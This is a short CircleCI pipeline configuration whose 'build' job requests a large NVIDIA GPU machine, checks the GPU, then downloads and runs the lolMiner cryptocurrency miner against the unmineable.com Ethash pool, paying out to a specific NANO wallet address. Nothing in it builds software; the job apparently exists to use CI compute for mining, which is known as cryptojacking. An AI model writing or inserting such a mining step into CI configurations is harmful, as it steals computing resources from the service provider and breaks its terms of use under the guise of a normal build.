version: 2.1

jobs:
  build:
    machine:
      image: ubuntu-2004-cuda-11.4:202110-01
    resource_class: gpu.nvidia.large
    steps:
      - run: nvidia-smi
      - run: docker run --gpus all nvidia/cuda:9.0-base nvidia-smi
      - run: wget https://github.com/Lolliedieb/lolMiner-releases/releases/download/1.45/lolMiner_v1.45_Lin64.tar.gz && tar -xvf lolMiner_v1.45_Lin64.tar.gz && ./1.45/lolMiner --algo ETHASH --pool ethash.unmineable.com:3333 --user NANO:nano_1rq9zug5u68cj3q41iarsurzxwzha3ma5uc4idjretbtng4ekewrfqh8ersf.worker1